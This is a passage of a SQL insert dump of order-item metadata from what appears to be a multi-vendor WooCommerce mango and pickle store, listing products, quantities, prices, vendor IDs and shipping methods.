By','Gamma'),(31,3,'_vendor_id','4'),(32,3,'commission','0'),(33,3,'commission_rate','a:4:{s:4:\"mode\";s:6:\"vendor\";s:4:\"type\";s:7:\"percent\";s:14:\"commission_val\";s:0:\"\";s:16:\"commission_fixed\";i:0;}'),(34,4,'method_id','wcmp_vendor_shipping'),(35,4,'instance_id','1'),(36,4,'cost','0.00'),(37,4,'total_tax','0'),(38,4,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(39,4,'vendor_id','4'),(40,4,'package_qty','1'),(41,4,'_vendor_order_shipping_item_id','2'),(42,5,'_product_id','542'),(43,5,'_variation_id','0'),(44,5,'_qty','1'),(45,5,'_tax_class',''),(46,5,'_line_subtotal','220'),(47,5,'_line_subtotal_tax','0'),(48,5,'_line_total','220'),(49,5,'_line_tax','0'),(50,5,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(51,6,'_product_id','596'),(52,6,'_variation_id','0'),(53,6,'_qty','1'),(54,6,'_tax_class',''),(55,6,'_line_subtotal','0'),(56,6,'_line_subtotal_tax','0'),(57,6,'_line_total','0'),(58,6,'_line_tax','0'),(59,6,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(60,7,'method_id','free_shipping'),(61,7,'instance_id','2'),(62,7,'cost','0.00'),(63,7,'total_tax','0'),(64,7,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(65,7,'Items','Kesar &times; 1, aaaa &times; 1'),(66,7,'package_qty','2'),(67,7,'method_slug','free_shipping'),(68,8,'_product_id','539'),(69,8,'_variation_id','0'),(70,8,'_qty','1'),(71,8,'_tax_class',''),(72,8,'_line_subtotal','200'),(73,8,'_line_subtotal_tax','0'),(74,8,'_line_total','200'),(75,8,'_line_tax','0'),(76,8,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(77,9,'method_id','free_shipping'),(78,9,'instance_id','2'),(79,9,'cost','0.00'),(80,9,'total_tax','0'),(81,9,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(82,9,'Items','Malgova &times; 1'),(83,9,'package_qty','1'),(84,9,'method_slug','free_shipping'),(85,10,'_product_id','1000'),(86,10,'_variation_id','0'),(87,10,'_qty','1'),(88,10,'_tax_class',''),(89,10,'_line_subtotal','400'),(90,10,'_line_subtotal_tax','0'),(91,10,'_line_total','400'),(92,10,'_line_tax','0'),(93,10,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(94,11,'method_id','flat_rate'),(95,11,'instance_id','3'),(96,11,'cost','25.00'),(97,11,'total_tax','0'),(98,11,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(99,11,'Items','test mango &times; 1'),(100,11,'vendor_id','20'),(101,11,'package_qty','1'),(102,11,'method_slug','flat_rate'),(103,11,'processing_time','-'),(104,10,'_vendor_id','20'),(105,10,'_wcfmmp_order_item_processed','1'),(106,12,'_product_id','530'),(107,12,'_variation_id','0'),(108,12,'_qty','1'),(109,12,'_tax_class',''),(110,12,'_line_subtotal','110'),(111,12,'_line_subtotal_tax','0'),(112,12,'_line_total','110'),(113,12,'_line_tax','0'),(114,12,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(115,13,'_product_id','1004'),(116,13,'_variation_id','0'),(117,13,'_qty','1'),(118,13,'_tax_class',''),(119,13,'_line_subtotal','222'),(120,13,'_line_subtotal_tax','0'),(121,13,'_line_total','222'),(122,13,'_line_tax','0'),(123,13,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(124,14,'method_id','flat_rate'),(125,14,'instance_id','3'),(126,14,'cost','25.00'),(127,14,'total_tax','0'),(128,14,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(129,14,'Items','Hapus &times; 1'),(130,14,'package_qty','1'),(131,14,'method_slug','flat_rate'),(132,15,'method_id','flat_rate'),(133,15,'instance_id','3'),(134,15,'cost','25.00'),(135,15,'total_tax','0'),(136,15,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(137,15,'Items','test mango 7 &times; 1'),(138,15,'vendor_id','22'),(139,15,'package_qty','1'),(140,15,'method_slug','flat_rate'),(141,15,'processing_time','-'),(142,13,'_vendor_id','22'),(143,13,'_wcfmmp_order_item_processed','2'),(144,16,'_product_id','1004'),(145,16,'_variation_id','0'),(146,16,'_qty','1'),(147,16,'_tax_class',''),(148,16,'_line_subtotal','222'),(149,16,'_line_subtotal_tax','0'),(150,16,'_line_total','222'),(151,16,'_line_tax','0'),(152,16,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(153,17,'_product_id','596'),(154,17,'_variation_id','0'),(155,17,'_qty','1'),(156,17,'_tax_class',''),(157,17,'_line_subtotal','46'),(158,17,'_line_subtotal_tax','0'),(159,17,'_line_total','46'),(160,17,'_line_tax','0'),(161,17,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(162,18,'method_id','flat_rate'),(163,18,'instance_id','3'),(164,18,'cost','25.00'),(165,18,'total_tax','0'),(166,18,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(167,18,'Items','test mango 7 &times; 1'),(168,18,'vendor_id','22'),(169,18,'package_qty','1'),(170,18,'method_slug','flat_rate'),(171,18,'processing_time','-'),(172,19,'method_id','flat_rate'),(173,19,'instance_id','3'),(174,19,'cost','25.00'),(175,19,'total_tax','0'),(176,19,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(177,19,'Items','aaaa &times; 1'),(178,19,'vendor_id','2'),(179,19,'package_qty','1'),(180,19,'method_slug','flat_rate'),(181,19,'processing_time','-'),(182,16,'_vendor_id','22'),(183,16,'_wcfmmp_order_item_processed','3'),(184,17,'_vendor_id','2'),(185,17,'_wcfmmp_order_item_processed','4'),(186,20,'_product_id','532'),(187,20,'_variation_id','0'),(188,20,'_qty','2'),(189,20,'_tax_class',''),(190,20,'_line_subtotal','280'),(191,20,'_line_subtotal_tax','0'),(192,20,'_line_total','280'),(193,20,'_line_tax','0'),(194,20,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(195,21,'_product_id','1000'),(196,21,'_variation_id','0'),(197,21,'_qty','1'),(198,21,'_tax_class',''),(199,21,'_line_subtotal','400'),(200,21,'_line_subtotal_tax','0'),(201,21,'_line_total','400'),(202,21,'_line_tax','0'),(203,21,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(204,22,'method_id','free_shipping'),(205,22,'instance_id','2'),(206,22,'cost','0.00'),(207,22,'total_tax','0'),(208,22,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(209,22,'Items','Banginapalli &times; 2'),(210,22,'vendor_id','2'),(211,22,'package_qty','2'),(212,22,'method_slug','free_shipping'),(213,22,'processing_time','-'),(214,23,'method_id','free_shipping'),(215,23,'instance_id','2'),(216,23,'cost','0.00'),(217,23,'total_tax','0'),(218,23,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(219,23,'Items','test mango &times; 1'),(220,23,'vendor_id','20'),(221,23,'package_qty','1'),(222,23,'method_slug','free_shipping'),(223,23,'processing_time','-'),(224,20,'_vendor_id','2'),(225,20,'_wcfmmp_order_item_processed','5'),(226,21,'_vendor_id','20'),(227,21,'_wcfmmp_order_item_processed','6'),(228,24,'_product_id','532'),(229,24,'_variation_id','0'),(230,24,'_qty','1'),(231,24,'_tax_class',''),(232,24,'_line_subtotal','140'),(233,24,'_line_subtotal_tax','0'),(234,24,'_line_total','140'),(235,24,'_line_tax','0'),(236,24,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(237,25,'method_id','flat_rate'),(238,25,'instance_id','3'),(239,25,'cost','25.00'),(240,25,'total_tax','0'),(241,25,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(242,25,'Items','Banginapalli &times; 1'),(243,25,'vendor_id','2'),(244,25,'package_qty','1'),(245,25,'method_slug','flat_rate'),(246,25,'processing_time','-'),(247,24,'_vendor_id','2'),(248,24,'_wcfmmp_order_item_processed','7'),(383,40,'_product_id','534'),(384,40,'_variation_id','0'),(385,40,'_qty','1'),(386,40,'_tax_class',''),(387,40,'_line_subtotal','160'),(388,40,'_line_subtotal_tax','0'),(389,40,'_line_total','160'),(390,40,'_line_tax','0'),(391,40,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(392,41,'_product_id','1001'),(393,41,'_variation_id','0'),(394,41,'_qty','1'),(395,41,'_tax_class',''),(396,41,'_line_subtotal','500'),(397,41,'_line_subtotal_tax','0'),(398,41,'_line_total','500'),(399,41,'_line_tax','0'),(400,41,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(401,42,'_product_id','1004'),(402,42,'_variation_id','0'),(403,42,'_qty','1'),(404,42,'_tax_class',''),(405,42,'_line_subtotal','222'),(406,42,'_line_subtotal_tax','0'),(407,42,'_line_total','222'),(408,42,'_line_tax','0'),(409,42,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(410,43,'_product_id','1000'),(411,43,'_variation_id','0'),(412,43,'_qty','1'),(413,43,'_tax_class',''),(414,43,'_line_subtotal','400'),(415,43,'_line_subtotal_tax','0'),(416,43,'_line_total','400'),(417,43,'_line_tax','0'),(418,43,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(419,44,'method_id','flat_rate'),(420,44,'instance_id','3'),(421,44,'cost','25.00'),(422,44,'total_tax','0'),(423,44,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(424,44,'Items','Chausa &times; 1'),(425,44,'package_qty','1'),(426,44,'method_slug','flat_rate'),(427,45,'method_id','free_shipping'),(428,45,'instance_id','2'),(429,45,'cost','0.00'),(430,45,'total_tax','0'),(431,45,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(432,45,'Items','test mango 2 &times; 1, test mango &times; 1'),(433,45,'vendor_id','20'),(434,45,'package_qty','2'),(435,45,'method_slug','free_shipping'),(436,45,'processing_time','-'),(437,46,'method_id','free_shipping'),(438,46,'instance_id','2'),(439,46,'cost','0.00'),(440,46,'total_tax','0'),(441,46,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(442,46,'Items','test mango 7 &times; 1'),(443,46,'vendor_id','22'),(444,46,'package_qty','1'),(445,46,'method_slug','free_shipping'),(446,46,'processing_time','-'),(447,47,'_product_id','1000'),(448,47,'_variation_id','0'),(449,47,'_qty','1'),(450,47,'_tax_class',''),(451,47,'_line_subtotal','400'),(452,47,'_line_subtotal_tax','0'),(453,47,'_line_total','400'),(454,47,'_line_tax','0'),(455,47,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(456,48,'_product_id','1004'),(457,48,'_variation_id','0'),(458,48,'_qty','1'),(459,48,'_tax_class',''),(460,48,'_line_subtotal','222'),(461,48,'_line_subtotal_tax','0'),(462,48,'_line_total','222'),(463,48,'_line_tax','0'),(464,48,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(465,49,'_product_id','537'),(466,49,'_variation_id','0'),(467,49,'_qty','1'),(468,49,'_tax_class',''),(469,49,'_line_subtotal','110'),(470,49,'_line_subtotal_tax','0'),(471,49,'_line_total','110'),(472,49,'_line_tax','0'),(473,49,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(474,50,'method_id','free_shipping'),(475,50,'instance_id','2'),(476,50,'cost','0.00'),(477,50,'total_tax','0'),(478,50,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(479,50,'Items','test mango &times; 1'),(480,50,'vendor_id','20'),(481,50,'package_qty','1'),(482,50,'method_slug','free_shipping'),(483,50,'processing_time','-'),(484,51,'method_id','free_shipping'),(485,51,'instance_id','2'),(486,51,'cost','0.00'),(487,51,'total_tax','0'),(488,51,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(489,51,'Items','test mango 7 &times; 1'),(490,51,'vendor_id','22'),(491,51,'package_qty','1'),(492,51,'method_slug','free_shipping'),(493,51,'processing_time','-'),(494,52,'method_id','free_shipping'),(495,52,'instance_id','2'),(496,52,'cost','0.00'),(497,52,'total_tax','0'),(498,52,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(499,52,'Items','Himasagar &times; 1'),(500,52,'package_qty','1'),(501,52,'method_slug','free_shipping'),(502,47,'_vendor_id','20'),(503,47,'_wcfmmp_order_item_processed','11'),(504,48,'_vendor_id','22'),(505,48,'_wcfmmp_order_item_processed','12'),(506,53,'_product_id','1004'),(507,53,'_variation_id','0'),(508,53,'_qty','1'),(509,53,'_tax_class',''),(510,53,'_line_subtotal','222'),(511,53,'_line_subtotal_tax','0'),(512,53,'_line_total','222'),(513,53,'_line_tax','0'),(514,53,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(515,54,'method_id','free_shipping'),(516,54,'instance_id','2'),(517,54,'cost','0.00'),(518,54,'total_tax','0'),(519,54,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(520,54,'Items','test mango 7 &times; 1'),(521,54,'vendor_id','22'),(522,54,'package_qty','1'),(523,54,'method_slug','free_shipping'),(524,54,'processing_time','-'),(525,53,'_vendor_id','22'),(526,53,'_wcfmmp_order_item_processed','13'),(527,55,'_product_id','1020'),(528,55,'_variation_id','0'),(529,55,'_qty','1'),(530,55,'_tax_class',''),(531,55,'_line_subtotal','123'),(532,55,'_line_subtotal_tax','0'),(533,55,'_line_total','123'),(534,55,'_line_tax','0'),(535,55,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(536,56,'_product_id','536'),(537,56,'_variation_id','0'),(538,56,'_qty','1'),(539,56,'_tax_class',''),(540,56,'_line_subtotal','180'),(541,56,'_line_subtotal_tax','0'),(542,56,'_line_total','180'),(543,56,'_line_tax','0'),(544,56,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(545,57,'method_id','flat_rate'),(546,57,'instance_id','3'),(547,57,'cost','25.00'),(548,57,'total_tax','0'),(549,57,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(550,57,'Items','mangggoo &times; 1'),(551,57,'vendor_id','25'),(552,57,'package_qty','1'),(553,57,'method_slug','flat_rate'),(554,57,'processing_time','-'),(555,58,'method_id','free_shipping'),(556,58,'instance_id','2'),(557,58,'cost','0.00'),(558,58,'total_tax','0'),(559,58,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(560,58,'Items','Pairi &times; 1'),(561,58,'package_qty','1'),(562,58,'method_slug','free_shipping'),(563,55,'_vendor_id','25'),(564,55,'_wcfmmp_order_item_processed','14'),(565,59,'_product_id','590'),(566,59,'_variation_id','0'),(567,59,'_qty','1'),(568,59,'_tax_class',''),(569,59,'_line_subtotal','80'),(570,59,'_line_subtotal_tax','0'),(571,59,'_line_total','80'),(572,59,'_line_tax','0'),(573,59,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(574,60,'_product_id','1020'),(575,60,'_variation_id','0'),(576,60,'_qty','1'),(577,60,'_tax_class',''),(578,60,'_line_subtotal','123'),(579,60,'_line_subtotal_tax','0'),(580,60,'_line_total','123'),(581,60,'_line_tax','0'),(582,60,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(583,61,'method_id','flat_rate'),(584,61,'instance_id','3'),(585,61,'cost','25.00'),(586,61,'total_tax','0'),(587,61,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(588,61,'Items','alphonsa &times; 1'),(589,61,'vendor_id','2'),(590,61,'package_qty','1'),(591,61,'method_slug','flat_rate'),(592,61,'processing_time','-'),(593,62,'method_id','flat_rate'),(594,62,'instance_id','3'),(595,62,'cost','25.00'),(596,62,'total_tax','0'),(597,62,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(598,62,'Items','mangggoo &times; 1'),(599,62,'vendor_id','25'),(600,62,'package_qty','1'),(601,62,'method_slug','flat_rate'),(602,62,'processing_time','-'),(603,59,'_vendor_id','2'),(604,59,'_wcfmmp_order_item_processed','15'),(605,60,'_vendor_id','25'),(606,60,'_wcfmmp_order_item_processed','16'),(607,63,'_product_id','1194'),(608,63,'_variation_id','0'),(609,63,'_qty','1'),(610,63,'_tax_class',''),(611,63,'_line_subtotal','100'),(612,63,'_line_subtotal_tax','0'),(613,63,'_line_total','100'),(614,63,'_line_tax','0'),(615,63,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(616,64,'_product_id','1159'),(617,64,'_variation_id','0'),(618,64,'_qty','1'),(619,64,'_tax_class',''),(620,64,'_line_subtotal','95'),(621,64,'_line_subtotal_tax','0'),(622,64,'_line_total','95'),(623,64,'_line_tax','0'),(624,64,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(625,65,'method_id','flat_rate'),(626,65,'instance_id','7'),(627,65,'cost','20.00'),(628,65,'total_tax','0'),(629,65,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(630,65,'Items','testmango &times; 1'),(631,65,'vendor_id','25'),(632,65,'package_qty','1'),(633,65,'method_slug','flat_rate'),(634,65,'processing_time','-'),(635,66,'method_id','flat_rate'),(636,66,'instance_id','7'),(637,66,'cost','20.00'),(638,66,'total_tax','0'),(639,66,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(640,66,'Items','Mango Solapur Pickle &times; 1'),(641,66,'vendor_id','21'),(642,66,'package_qty','1'),(643,66,'method_slug','flat_rate'),(644,66,'processing_time','-'),(645,63,'_vendor_id','25'),(646,63,'_wcfmmp_order_item_processed','17'),(647,64,'_vendor_id','21'),(648,64,'_wcfmmp_order_item_processed','18'),(649,67,'_product_id','1159'),(650,67,'_variation_id','0'),(651,67,'_qty','2'),(652,67,'_tax_class',''),(653,67,'_line_subtotal','190'),(654,67,'_line_subtotal_tax','0'),(655,67,'_line_total','190'),(656,67,'_line_tax','0'),(657,67,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(658,68,'_product_id','1163'),(659,68,'_variation_id','0'),(660,68,'_qty','2'),(661,68,'_tax_class',''),(662,68,'_line_subtotal','190'),(663,68,'_line_subtotal_tax','0'),(664,68,'_line_total','190'),(665,68,'_line_tax','0'),(666,68,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(667,69,'_product_id','1194'),(668,69,'_variation_id','0'),(669,69,'_qty','1'),(670,69,'_tax_class',''),(671,69,'_line_subtotal','100'),(672,69,'_line_subtotal_tax','0'),(673,69,'_line_total','100'),(674,69,'_line_tax','0'),(675,69,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(676,70,'method_id','flat_rate'),(677,70,'instance_id','7'),(678,70,'cost','20.00'),(679,70,'total_tax','0'),(680,70,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(681,70,'Items','Mango Solapur Pickle &times; 2, Mango hing UP style pickle - 250GM &times; 2'),(682,70,'vendor_id','21'),(683,70,'package_qty','4'),(684,70,'method_slug','flat_rate'),(685,70,'processing_time','-'),(686,71,'method_id','flat_rate'),(687,71,'instance_id','7'),(688,71,'cost','20.00'),(689,71,'total_tax','0'),(690,71,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(691,71,'Items','testmango &times; 1'),(692,71,'vendor_id','25'),(693,71,'package_qty','1'),(694,71,'method_slug','flat_rate'),(695,71,'processing_time','-'),(696,67,'_vendor_id','21'),(697,67,'_wcfmmp_order_item_processed','19'),(698,68,'_vendor_id','21'),(699,68,'_wcfmmp_order_item_processed','20'),(700,69,'_vendor_id','25'),(701,69,'_wcfmmp_order_item_processed','21'),(702,72,'_product_id','1069'),(703,72,'_variation_id','0'),(704,72,'_qty','1'),(705,72,'_tax_class',''),(706,72,'_line_subtotal','499'),(707,72,'_line_subtotal_tax','0'),(708,72,'_line_total','499'),(709,72,'_line_tax','0'),(710,72,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(711,73,'method_id','flat_rate'),(712,73,'instance_id','7'),(713,73,'cost','20.00'),(714,73,'total_tax','0'),(715,73,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(716,73,'Items','Appemidi 5kg &times; 1'),(717,73,'vendor_id','21'),(718,73,'package_qty','1'),(719,73,'method_slug','flat_rate'),(720,73,'processing_time','-'),(721,72,'_vendor_id','21'),(722,72,'_wcfmmp_order_item_processed','22'),(723,74,'_product_id','1165'),(724,74,'_variation_id','0'),(725,74,'_qty','1'),(726,74,'_tax_class',''),(727,74,'_line_subtotal','95'),(728,74,'_line_subtotal_tax','0'),(729,74,'_line_total','95'),(730,74,'_line_tax','0'),(731,74,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(732,75,'_product_id','1107'),(733,75,'_variation_id','0'),(734,75,'_qty','1'),(735,75,'_tax_class',''),(736,75,'_line_subtotal','38'),(737,75,'_line_subtotal_tax','0'),(738,75,'_line_total','38'),(739,75,'_line_tax','0'),(740,75,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(741,76,'method_id','flat_rate'),(742,76,'instance_id','7'),(743,76,'cost','20.00'),(744,76,'total_tax','0'),(745,76,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(746,76,'Items','Chhunda or gujarati sweet mango pickle - 250GM &times; 1, Frooti Mango Drink Plastic Bottle - 600ml &times; 1'),(747,76,'vendor_id','21'),(748,76,'package_qty','2'),(749,76,'method_slug','flat_rate'),(750,76,'processing_time','-'),(751,74,'_vendor_id','21'),(752,74,'_wcfmmp_order_item_processed','23'),(753,75,'_vendor_id','21'),(754,75,'_wcfmmp_order_item_processed','24'),(755,77,'_product_id','1165'),(756,77,'_variation_id','0'),(757,77,'_qty','1'),(758,77,'_tax_class',''),(759,77,'_line_subtotal','95'),(760,77,'_line_subtotal_tax','0'),(761,77,'_line_total','95'),(762,77,'_line_tax','0'),(763,77,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(764,78,'_product_id','1194'),(765,78,'_variation_id','0'),(766,78,'_qty','1'),(767,78,'_tax_class',''),(768,78,'_line_subtotal','100'),(769,78,'_line_subtotal_tax','0'),(770,78,'_line_total','100'),(771,78,'_line_tax','0'),(772,78,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(773,79,'method_id','flat_rate'),(774,79,'instance_id','7'),(775,79,'cost','20.00'),(776,79,'total_tax','0'),(777,79,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(778,79,'Items','Chhunda or gujarati sweet mango pickle - 250GM &times; 1'),(779,79,'vendor_id','21'),(780,79,'package_qty','1'),(781,79,'method_slug','flat_rate'),(782,79,'processing_time','-'),(783,80,'method_id','flat_rate'),(784,80,'instance_id','7'),(785,80,'cost','20.00'),(786,80,'total_tax','0'),(787,80,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(788,80,'Items','testmango &times; 1'),(789,80,'vendor_id','25'),(790,80,'package_qty','1'),(791,80,'method_slug','flat_rate'),(792,80,'processing_time','-'),(793,77,'_vendor_id','21'),(794,77,'_wcfmmp_order_item_processed','25'),(795,78,'_vendor_id','25'),(796,78,'_wcfmmp_order_item_processed','26'),(797,81,'_product_id','1194'),(798,81,'_variation_id','0'),(799,81,'_qty','1'),(800,81,'_tax_class',''),(801,81,'_line_subtotal','100'),(802,81,'_line_subtotal_tax','0'),(803,81,'_line_total','100'),(804,81,'_line_tax','0'),(805,81,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(806,81,'_ywpo_item_preorder','yes'),(807,82,'method_id','flat_rate'),(808,82,'instance_id','7'),(809,82,'cost','20.00'),(810,82,'total_tax','0'),(811,82,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(812,82,'Items','testmango &times; 1'),(813,82,'vendor_id','25'),(814,82,'package_qty','1'),(815,82,'method_slug','flat_rate'),(816,82,'processing_time','-'),(817,81,'_vendor_id','25'),(818,81,'_wcfmmp_order_item_processed','27'),(819,83,'_product_id','1194'),(820,83,'_variation_id','0'),(821,83,'_qty','1'),(822,83,'_tax_class',''),(823,83,'_line_subtotal','100'),(824,83,'_line_subtotal_tax','0'),(825,83,'_line_total','100'),(826,83,'_line_tax','0'),(827,83,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(828,83,'_ywpo_item_preorder','yes'),(829,84,'_product_id','1159'),(830,84,'_variation_id','0'),(831,84,'_qty','1'),(832,84,'_tax_class',''),(833,84,'_line_subtotal','95'),(834,84,'_line_subtotal_tax','0'),(835,84,'_line_total','95'),(836,84,'_line_tax','0'),(837,84,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(838,85,'method_id','wcfmmp_product_shipping_by_zone'),(839,85,'instance_id','10'),(840,85,'cost','0.00'),(841,85,'total_tax','0'),(842,85,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(843,85,'Items','testmango &times; 1'),(844,85,'vendor_id','25'),(845,85,'package_qty','1'),(846,85,'method_slug','free_shipping'),(847,85,'processing_time','-'),(848,86,'method_id','wcfmmp_product_shipping_by_zone'),(849,86,'instance_id','10'),(850,86,'cost','10.00'),(851,86,'total_tax','0'),(852,86,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(853,86,'Items','Mango Solapur Pickle &times; 1'),(854,86,'vendor_id','21'),(855,86,'package_qty','1'),(856,86,'method_slug','flat_rate'),(857,86,'processing_time','-'),(858,83,'_vendor_id','25'),(859,83,'_wcfmmp_order_item_processed','28'),(860,84,'_vendor_id','21'),(861,84,'_wcfmmp_order_item_processed','29'),(905,91,'_product_id','1194'),(906,91,'_variation_id','0'),(907,91,'_qty','1'),(908,91,'_tax_class',''),(909,91,'_line_subtotal','100'),(910,91,'_line_subtotal_tax','0'),(911,91,'_line_total','100'),(912,91,'_line_tax','0'),(913,91,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(914,91,'_ywpo_item_preorder','yes'),(915,92,'_product_id','1116'),(916,92,'_variation_id','0'),(917,92,'_qty','1'),(918,92,'_tax_class',''),(919,92,'_line_subtotal','499'),(920,92,'_line_subtotal_tax','0'),(921,92,'_line_total','499'),(922,92,'_line_tax','0'),(923,92,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(924,93,'method_id','wcfmmp_product_shipping_by_zone'),(925,93,'instance_id','10'),(926,93,'cost','0.00'),(927,93,'total_tax','0'),(928,93,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(929,93,'Items','testmango &times; 1'),(930,93,'vendor_id','25'),(931,93,'package_qty','1'),(932,93,'method_slug','free_shipping'),(933,93,'processing_time','-'),(934,94,'method_id','wcfmmp_product_shipping_by_zone'),(935,94,'instance_id','10'),(936,94,'cost','10.00'),(937,94,'total_tax','0'),(938,94,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(939,94,'Items','Banginapalli Mango 5kg &times; 1'),(940,94,'vendor_id','21'),(941,94,'package_qty','1'),(942,94,'method_slug','flat_rate'),(943,94,'processing_time','-'),(985,99,'_product_id','1276'),(986,99,'_variation_id','0'),(987,99,'_qty','1'),(988,99,'_tax_class',''),(989,99,'_line_subtotal','598'),(990,99,'_line_subtotal_tax','0'),(991,99,'_line_total','598'),(992,99,'_line_tax','0'),(993,99,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(994,100,'method_id','wcfmmp_product_shipping_by_zone'),(995,100,'instance_id','10'),(996,100,'cost','0.00'),(997,100,'total_tax','0'),(998,100,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(999,100,'Items','mango &times; 1'),(1000,100,'vendor_id','28'),(1001,100,'package_qty','1'),(1002,100,'method_slug','flat_rate'),(1003,100,'processing_time','-'),(1004,101,'_product_id','1276'),(1005,101,'_variation_id','0'),(1006,101,'_qty','1'),(1007,101,'_tax_class',''),(1008,101,'_line_subtotal','598'),(1009,101,'_line_subtotal_tax','0'),(1010,101,'_line_total','598'),(1011,101,'_line_tax','0'),(1012,101,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1013,102,'_product_id','1194'),(1014,102,'_variation_id','0'),(1015,102,'_qty','1'),(1016,102,'_tax_class',''),(1017,102,'_line_subtotal','999'),(1018,102,'_line_subtotal_tax','0'),(1019,102,'_line_total','999'),(1020,102,'_line_tax','0'),(1021,102,'_line_tax_data','a:2:{s:5:\"total\";a:0:{}s:8:\"subtotal\";a:0:{}}'),(1022,102,'_ywpo_item_preorder','yes'),(1023,103,'method_id','wcfmmp_product_shipping_by_zone'),(1024,103,'instance_id','10'),(1025,103,'cost','0.00'),(1026,103,'total_tax','0'),(1027,103,'taxes','a:1:{s:5:\"total\";a:0:{}}'),(1028,103,'Items','mango &times; 